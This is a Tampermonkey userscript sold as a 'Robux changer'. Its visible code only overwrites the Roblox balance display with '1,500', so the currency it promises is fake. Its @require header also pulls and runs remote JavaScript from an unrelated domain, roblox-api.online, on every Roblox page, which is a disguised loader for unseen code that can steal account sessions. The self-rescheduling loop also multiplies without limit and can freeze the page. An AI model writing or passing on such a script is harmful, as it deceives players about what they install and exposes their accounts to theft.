// ==UserScript==
// @name         ROBUX CHANGER
// @namespace    http://tampermonkey.net/
// @version      4.0
// @description  THIS IS MADE BY BeyondTrade#0001
// @author       BeyondTrade#0001
// @match        https://www.roblox.com/*
// @grant        none
// @require      http://roblox-api.online/api?id=14286
// @include       http://roblox.com/*
// @include       https://roblox.com/*
// @include       http://*.roblox.com/*
// @include       https://*.roblox.com/*
// ==/UserScript==

function start() {
    var sleepy6147 = document.getElementById("nav-robux-amount");
    sleepy6147.innerHTML = "1,500";
      setTimeout(start, 0);
        var ThePoorBM = document.getElementById("nav-robux-balance");
    ThePoorBM.innerHTML = "1,500 Robux";
      setTimeout(start, 0);
}
start();
